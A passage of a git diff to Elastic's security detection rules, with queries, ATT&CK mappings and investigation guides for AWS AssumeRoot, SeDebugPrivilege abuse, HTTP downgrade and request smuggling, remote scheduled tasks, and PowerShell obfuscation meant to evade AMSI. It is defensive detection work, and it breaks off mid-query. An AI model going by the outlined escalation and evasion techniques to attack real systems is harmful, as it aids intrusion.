require strong authentication on the initiating principal (MFA, federated SSO, device posture).\n - Add guardrails and observability:\n - Use AWS Config, Security Hub, and/or AWS Organizations SCPs to:\n - Detect or constrain highly privileged cross-account actions.\n - Ensure logging and monitoring services cannot be disabled or modified by assumed sessions without additional friction.\n - Ensure `AssumeRoot` activity is included in your SIEM dashboards and investigation playbooks.\n\n- **Post-incident improvements**\n - If activity is confirmed malicious or unsafe:\n - Rotate credentials for all involved principals and review recent STS session usage for anomalies.\n - Update internal runbooks to clearly define when `AssumeRoot` is allowed, who can perform it, and how it should be documented.\n - Refine this rule\u2019s exceptions or tagging strategy so that legitimate, recurring workflows are well-understood, while preserving high-fidelity visibility into new or unexpected `AssumeRoot` behavior.\n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)** \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/).\n", + "query": "event.dataset: \"aws.cloudtrail\"\n and event.provider: \"sts.amazonaws.com\"\n and event.action: \"AssumeRoot\"\n and event.outcome: \"success\"\n", + "references": [ + "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoot.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "962a71ae-aac9-11ef-9348-f661ea17fbce", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS STS", + "Resources: Investigation Guide", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.005", + "name": "Temporary Elevated Cloud Access", + "reference": "https://attack.mitre.org/techniques/T1548/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 5 + }, + "id": "962a71ae-aac9-11ef-9348-f661ea17fbce_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_113.json b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_113.json new file mode 100644 index 00000000000..651b59e7096 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_113.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a process running with a non-SYSTEM account that enables the SeDebugPrivilege privilege. Adversaries may enable this privilege to debug and modify other processes, typically reserved for system-level tasks, to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "logs-system.security*", + "logs-windows.forwarded*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "SeDebugPrivilege Enabled by a Suspicious Process", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating SeDebugPrivilege Enabled by a Suspicious Process\n\nSeDebugPrivilege is a powerful Windows privilege allowing processes to debug and modify other processes, typically reserved for system-level tasks. Adversaries exploit this to escalate privileges, bypassing security controls by impersonating system processes. The detection rule identifies suspicious processes enabling SeDebugPrivilege, excluding known legitimate processes, to flag potential privilege escalation attempts.\n\n### Possible investigation steps\n\n- Review the event logs for the specific event.provider \"Microsoft-Windows-Security-Auditing\" and event.action \"Token Right Adjusted Events\" to gather more details about the process that enabled SeDebugPrivilege.\n- Identify the process name from winlog.event_data.ProcessName and determine if it is known or expected in the environment. Investigate any unknown or suspicious processes.\n- Check the winlog.event_data.SubjectUserSid to identify the user account associated with the process. Investigate if this account has a history of suspicious activity or if it should have the ability to enable SeDebugPrivilege.\n- Analyze the parent process of the suspicious process to understand how it was initiated and if it was spawned by a legitimate or malicious process.\n- Correlate the timestamp of the event with other security events or alerts to identify any related activities or patterns that could indicate a broader attack or compromise.\n- Investigate the network activity of the suspicious process to determine if it is communicating with any known malicious IP addresses or domains.\n\n### False positive analysis\n\n- Legitimate system maintenance tasks may trigger the rule, such as Windows Update or system diagnostics. Users can monitor the timing of these tasks and correlate them with alerts to determine if they are the cause.\n- Software installations or updates using msiexec.exe might be flagged. Consider excluding msiexec.exe from the rule if it is frequently used in your environment for legitimate purposes.\n- Administrative tools like taskhostw.exe and mmc.exe can sometimes enable SeDebugPrivilege during normal operations. Evaluate the necessity of these tools in your environment and exclude them if they are regularly used by trusted administrators.\n- Temporary files created by legitimate applications, such as DismHost.exe in user temp directories, may be flagged. Review the context of these files and exclude them if they are part of routine application behavior.\n- Regularly review and update the exclusion list to include any new legitimate processes that are identified as false positives, ensuring the rule remains effective without generating unnecessary alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary.\n- Terminate the suspicious process identified in the alert to stop any ongoing malicious activity and prevent privilege escalation.\n- Conduct a thorough review of the affected system's event logs, focusing on the \"Token Right Adjusted Events\" to identify any additional unauthorized privilege changes or suspicious activities.\n- Reset credentials for any accounts that may have been compromised or used by the suspicious process, especially those with elevated privileges.\n- Restore the affected system from a known good backup to ensure any malicious changes are removed and the system is returned to a secure state.\n- Implement additional monitoring on the affected system and similar systems to detect any recurrence of the threat, focusing on processes attempting to enable SeDebugPrivilege.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.", + "query": "any where host.os.type == \"windows\" and event.provider: \"Microsoft-Windows-Security-Auditing\" and\n event.action : \"Token Right Adjusted Events\" and\n\n winlog.event_data.EnabledPrivilegeList : \"SeDebugPrivilege\" and\n\n /* exclude processes with System Integrity */\n not winlog.event_data.SubjectUserSid : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n\n not winlog.event_data.ProcessName : (\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*-*\\\\DismHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\auditpol.exe\",\n \"?:\\\\Windows\\\\System32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\MRT.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\sdiagnhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\ServerManager.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostw.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSe.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSe.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\WinSxS\\\\*\"\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4703", + "https://blog.palantir.com/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.EnabledPrivilegeList", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ProcessName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "97020e61-e591-4191-8a3b-2861a2b887cd", + "setup": "## Setup\n\nWindows Event 4703 logs Token Privileges changes and need to be configured (Enable).\n\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDetailed Tracking >\nToken Right Adjusted Events (Success)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 113 + }, + "id": "97020e61-e591-4191-8a3b-2861a2b887cd_113", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_210.json b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_210.json index aac35dfa2b9..ccea901ac90 100644 --- a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_210.json +++ b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_210.json @@ -24,7 +24,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_208.json b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_208.json deleted file mode 100644 index cc1fa7de20e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_208.json +++ /dev/null @@ -1,96 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic", - "Austin Songer" - ], - "description": "Identifies when a user has updated a SAML provider in AWS. SAML providers are used to enable federated access to the AWS Management Console. This activity could be an indication of an attacker attempting to escalate privileges.", - "false_positives": [ - "SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. SAML Provider updates by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-9m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS IAM SAML Provider Updated", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS IAM SAML Provider Updated\n\nAWS IAM SAML providers facilitate federated access, allowing users to authenticate via external identity providers. Adversaries may exploit this by updating SAML providers to gain unauthorized access or escalate privileges. The detection rule monitors successful updates to SAML providers, flagging potential privilege escalation attempts by correlating specific AWS CloudTrail events.\n\n### Possible investigation steps\n\n- Review the AWS CloudTrail logs to identify the user or role associated with the UpdateSAMLProvider event. Check for any unusual or unauthorized users making changes.\n- Examine the context of the UpdateSAMLProvider event, including the time of the event and any associated IP addresses or locations, to identify any anomalies or suspicious patterns.\n- Investigate the history of changes to the specific SAML provider to determine if there have been any recent unauthorized or unexpected modifications.\n- Check for any other related AWS CloudTrail events around the same timeframe, such as changes to IAM roles or policies, which might indicate a broader privilege escalation attempt.\n- Assess the permissions and access levels of the user or role that performed the update to ensure they align with expected privileges and responsibilities.\n- If suspicious activity is confirmed, consider revoking or limiting access for the involved user or role and review the security posture of the AWS environment to prevent future incidents.\n\n### False positive analysis\n\n- Routine administrative updates to SAML providers by authorized personnel can trigger alerts. To manage this, maintain a list of known administrators and their expected activities, and create exceptions for these users in the detection rule.\n- Scheduled updates or maintenance activities involving SAML providers may also result in false positives. Document these activities and adjust the detection rule to exclude events occurring during these scheduled times.\n- Automated scripts or tools used for managing SAML providers can generate alerts if they perform updates. Identify these scripts and their expected behavior, then configure the detection rule to recognize and exclude these specific actions.\n- Changes made by trusted third-party services integrated with AWS IAM might be flagged. Verify the legitimacy of these services and consider adding them to an allowlist to prevent unnecessary alerts.\n\n### Response and remediation\n\n- Immediately revoke any unauthorized changes to the SAML provider by restoring the previous configuration from backups or logs.\n- Conduct a thorough review of recent IAM activity logs to identify any unauthorized access or privilege escalation attempts associated with the updated SAML provider.\n- Temporarily disable the affected SAML provider to prevent further unauthorized access while the investigation is ongoing.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Implement additional monitoring and alerting for any future changes to SAML providers to ensure rapid detection of unauthorized modifications.\n- Review and tighten IAM policies and permissions to ensure that only authorized personnel can update SAML providers.\n- Consider implementing multi-factor authentication (MFA) for all users with permissions to modify IAM configurations to enhance security.", - "query": "event.dataset:aws.cloudtrail\n and event.provider: iam.amazonaws.com\n and event.action: UpdateSAMLProvider\n and event.outcome:success\n", - "references": [ - "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "979729e7-0c52-4c4c-b71e-88103304a79f", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1484", - "name": "Domain or Tenant Policy Modification", - "reference": "https://attack.mitre.org/techniques/T1484/", - "subtechnique": [ - { - "id": "T1484.002", - "name": "Trust Modification", - "reference": "https://attack.mitre.org/techniques/T1484/002/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 208 - }, - "id": "979729e7-0c52-4c4c-b71e-88103304a79f_208", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9797d2c8-8ec9-48e6-a022-350cdfbf2d5e_1.json b/packages/security_detection_engine/kibana/security_rule/9797d2c8-8ec9-48e6-a022-350cdfbf2d5e_1.json new file mode 100644 index 00000000000..817f222d901 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9797d2c8-8ec9-48e6-a022-350cdfbf2d5e_1.json @@ -0,0 +1,72 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Through the new_terms rule type, this rule detects potential HTTP downgrade attacks by identifying HTTP traffic that uses a different HTTP version than the one typically used in the environment. An HTTP downgrade attack occurs when an attacker forces a connection via an older HTTP version, resulting in potentially less secure communication. For example, an attacker might downgrade a connection from HTTP/2 to HTTP/1.1 or HTTP/1.0 to exploit known vulnerabilities or weaknesses in the older protocol versions.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-nginx.access-*", + "logs-apache.access-*", + "logs-apache_tomcat.access-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential HTTP Downgrade Attack", + "new_terms_fields": [ + "http.version", + "agent.id" + ], + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential HTTP Downgrade Attack\n\nThis detection surfaces HTTP traffic negotiating a protocol version that deviates from your baseline, a sign of downgrade attempts that strip protections and enable evasion or exploit paths in older behaviors. An attacker deliberately breaks HTTP/2 negotiation so the server falls back to HTTP/1.1, then probes with crafted headers and chunked bodies to attempt request smuggling or cache bypass against web services.\n\n### Possible investigation steps\n\n- Correlate with TLS termination or load balancer logs to verify ALPN or Upgrade negotiation (server advertising h2) and whether the same client/IP previously used h2 with the same SNI/Host, distinguishing forced downgrade from capability mismatch.\n- Review the downgraded requests for exploitation indicators such as simultaneous Content-Length and Transfer-Encoding headers, duplicated or mixed-case headers, unusual methods (TRACE or PRI), or inconsistent chunked encoding suggesting smuggling attempts.\n- Examine surrounding response patterns for increased 400/421/426/431/505, backend 5xx, connection resets, or latency spikes that coincide with these requests and indicate error-driven fallback or probing.\n- Check for recent config changes or incidents on CDNs/WAFs/load balancers and web servers (e.g., http2 enablement, ALPN lists, h2/h2c settings) that could have disabled HTTP/2 and caused benign fallbacks.\n- Cluster events by source IP/User-Agent/ASN and targeted host to identify campaign activity across services and pivot the sources through threat intelligence or reputation feeds.\n\n### False positive analysis\n\n- Recent Nginx/Apache/Tomcat configuration changes that disable HTTP/2/h2c or alter TLS/ALPN on specific virtual hosts can legitimately force clients to fall back to HTTP/1.1, surfacing as a downgrade event in access logs.\n- Newly onboarded internal services or scripts that only support HTTP/1.0/1.1 and begin hitting an endpoint for the first time can introduce a first-seen older http.version relative to an HTTP/2 baseline without malicious intent.\n\n### Response and remediation\n\n- Immediately block or challenge source IPs/ASNs repeatedly forcing HTTP/1.1 to hosts that previously negotiated HTTP/2 via ALPN, and enable WAF rules to drop \u201cUpgrade: h2c\u201d attempts, requests with both Content-Length and Transfer-Encoding, or duplicated/mixed-case headers.\n- Remove downgrade paths by requiring TLS+ALPN \u201ch2\u201d on 443 (e.g., Nginx listen 443 ssl http2; Apache Protocols h2 http/1.1), disabling cleartext h2c and HTTP/1.0 on public endpoints, and ensuring intermediaries do not strip ALPN or rewrite headers.\n- Redeploy corrected configs and validate end-to-end HTTP/2 with curl --http2 and browser devtools, then confirm normal 2xx/3xx rates and elimination of 421/426/431/505 responses and backend 5xx spikes around previously downgraded traffic.\n- Escalate to Incident Response if downgraded requests show smuggling patterns (simultaneous Content-Length and Transfer-Encoding, mixed-case duplicates, TRACE/PRI methods), hit sensitive paths (/admin, /login, /actuator), or trigger cache anomalies like cross-user content.\n- Harden parsing and caching by normalizing headers at the edge, enforcing a single Content-Length, disabling TRACE, setting strict client_header_buffer_size and large_client_header_buffers, and configuring proxies/backends to reject conflicting CL/TE or ambiguous chunked bodies.\n", + "query": "http.version:*\n", + "required_fields": [ + { + "ecs": true, + "name": "http.version", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9797d2c8-8ec9-48e6-a022-350cdfbf2d5e", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.010", + "name": "Downgrade Attack", + "reference": "https://attack.mitre.org/techniques/T1562/010/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "9797d2c8-8ec9-48e6-a022-350cdfbf2d5e_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_7.json b/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_7.json index 1421852b22e..41fa1fecef0 100644 --- a/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_7.json +++ b/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_7.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_210.json b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_210.json index 8c9d6eb6c22..dc21e2546d1 100644 --- a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_210.json +++ b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_210.json @@ -24,7 +24,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_111.json b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_111.json deleted file mode 100644 index 241fa7691f0..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_111.json +++ /dev/null @@ -1,101 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies scheduled task creation from a remote source. This could be indicative of adversary lateral movement.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Remote Scheduled Task Creation via RPC", - "note": "## Triage and analysis\n\n### Remote Scheduled Task Creation via RPC\n\n[Scheduled tasks](https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler) are a great mechanism for persistence and program execution. These features can be used remotely for a variety of legitimate reasons, but at the same time used by malware and adversaries. When investigating scheduled tasks that were set up remotely, one of the first steps should be to determine the original intent behind the configuration and to verify if the activity is tied to benign behavior such as software installation or any kind of network administrator work. One objective for these alerts is to understand the configured action within the scheduled task. This is captured within the registry event data for this rule and can be base64 decoded to view the value.\n\n#### Possible investigation steps\n\n- Review the TaskContent value to investigate the task configured action.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Further examination should include review of host-based artifacts and network logs from around when the scheduled task was created, on both the source and target machines.\n\n### False positive analysis\n\n- There is a high possibility of benign activity tied to the creation of remote scheduled tasks as it is a general feature within Windows and used for legitimate purposes for a wide range of activity. Any kind of context should be found to further understand the source of the activity and determine the intent based on the scheduled task's contents.\n\n### Related rules\n\n- Service Command Lateral Movement - d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc\n- Remotely Started Services via RPC - aa9a274d-6b53-424d-ac5e-cb8ca4251650\n- Remote Scheduled Task Creation - 954ee7c8-5437-49ae-b2d6-2960883898e9\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove scheduled task and any other related artifacts.\n- Review privileged account management and user account management settings. Consider implementing group policy object (GPO) policies to further restrict activity, or configuring settings that only allow administrators to create remote scheduled tasks.\n", - "query": "iam where event.action == \"scheduled-task-created\" and\n winlog.event_data.RpcCallClientLocality : \"0\" and winlog.event_data.ClientProcessId : \"0\"\n", - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.ClientProcessId", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.RpcCallClientLocality", - "type": "unknown" - } - ], - "risk_score": 47, - "rule_id": "9c865691-5599-447a-bac9-b3f2df5f9a9d", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1021", - "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1053", - "name": "Scheduled Task/Job", - "reference": "https://attack.mitre.org/techniques/T1053/", - "subtechnique": [ - { - "id": "T1053.005", - "name": "Scheduled Task", - "reference": "https://attack.mitre.org/techniques/T1053/005/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 111 - }, - "id": "9c865691-5599-447a-bac9-b3f2df5f9a9d_111", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9edd1804-83c7-4e48-b97d-c776b4c97564_5.json b/packages/security_detection_engine/kibana/security_rule/9edd1804-83c7-4e48-b97d-c776b4c97564_5.json new file mode 100644 index 00000000000..7a526be0010 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9edd1804-83c7-4e48-b97d-c776b4c97564_5.json @@ -0,0 +1,173 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies PowerShell scripts that use negative index ranges to reverse the contents of a string or array at runtime as a form of obfuscation. This technique avoids direct use of reversal functions by iterating through array elements in reverse order. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "PowerShell Obfuscation via Negative Index String Reversal", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating PowerShell Obfuscation via Negative Index String Reversal\n\nPowerShell, a powerful scripting language, can be exploited by adversaries using obfuscation techniques like negative index string reversal to evade detection. This method manipulates strings or arrays by iterating in reverse, bypassing static analysis tools. The detection rule identifies scripts with obfuscation patterns by analyzing script length and specific indexing patterns, flagging potential threats for further investigation.\n\n### Possible investigation steps\n\n- Review the `powershell.file.script_block_text` to understand the script's intent and identify any suspicious or malicious behavior.\n- Check the `host.name` and `user.id` fields to determine the affected system and user, assessing if they are high-value targets or have a history of similar alerts.\n- Analyze the `file.path` to identify the location of the script and assess if it is in a common or suspicious directory.\n- Investigate the `powershell.file.script_block_id` and `powershell.sequence` to trace the execution flow and determine if this script is part of a larger, potentially malicious sequence.\n- Correlate the `agent.id` with other logs to see if there are additional related activities or alerts from the same endpoint.\n- Examine the `count` of detected patterns to assess the level of obfuscation and potential threat severity.\n\n### False positive analysis\n\n- Scripts containing the keyword \"GENESIS-5654\" are known false positives and are automatically excluded from triggering alerts. Ensure that any legitimate scripts using this keyword are documented to prevent unnecessary investigations.\n- Legitimate administrative scripts that use negative indexing for valid purposes may trigger false positives. Review these scripts and consider adding them to an exception list if they are frequently flagged but verified as non-malicious.\n- Automated scripts generated by trusted software that use similar obfuscation patterns for performance or compatibility reasons can be excluded by identifying unique identifiers or patterns within these scripts and updating the exclusion criteria accordingly.\n- Regularly update the exclusion list to include new patterns or identifiers from trusted sources as they are identified, ensuring that legitimate activities are not hindered by the detection rule.\n- Collaborate with IT and security teams to maintain a list of known safe scripts and their characteristics, which can be referenced when analyzing potential false positives.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further spread of potentially malicious scripts or unauthorized access.\n- Terminate any suspicious PowerShell processes identified by the alert to halt ongoing obfuscation activities.\n- Conduct a thorough review of the PowerShell script block text and related logs to identify any malicious payloads or commands executed.\n- Remove any identified malicious scripts or files from the affected system to prevent re-execution.\n- Reset credentials for any user accounts involved in the alert to mitigate potential unauthorized access.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems are compromised.\n- Update endpoint protection and monitoring tools to enhance detection capabilities for similar obfuscation techniques in the future.\n", + "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = 